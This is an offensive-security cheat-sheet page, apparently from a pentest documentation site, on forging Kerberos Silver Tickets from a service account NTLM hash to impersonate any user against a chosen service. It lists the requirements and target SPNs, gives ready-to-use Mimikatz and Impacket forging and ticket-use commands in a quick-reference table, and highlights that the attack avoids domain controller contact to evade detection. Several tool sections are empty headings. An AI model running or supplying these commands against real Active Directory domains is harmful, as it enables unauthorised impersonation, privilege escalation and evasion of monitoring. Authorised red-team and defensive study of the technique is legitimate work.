Documentation Index
Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
Use this file to discover all available pages before exploring further.
Overview
Forge TGS for specific service using service account NTLM hash. Unlike Golden Ticket — no DC contact needed, harder to detect. Limited to single service.Requirements
- Service account NTLM hash
- Domain SID
- Target SPN
Common SPNs
| Service | SPN Format |
|---|---|
| CIFS (SMB) | cifs/target.domain.local |
| HTTP | http/target.domain.local |
| MSSQL | MSSQLSvc/target.domain.local:1433 |
| HOST | host/target.domain.local |
| LDAP | ldap/dc.domain.local |
| WSMAN | wsman/target.domain.local |
Forge — Mimikatz
MSSQL
Forge — Impacket
Use
Forge — Rubeus
Get Service Account Hash
Notes
- No DC contact → harder to detect
- Forged for single service only
- Machine account hash works for CIFS/HOST
- Can set any user, any groups in PAC
Quick Reference
| Task | Command |
|---|---|
| Forge CIFS | kerberos::golden /service:cifs /rc4:HASH /ptt |
| Impacket | impacket-ticketer -nthash HASH -spn cifs/target Admin |
| Use | export KRB5CCNAME=Admin.ccache → -k -no-pass |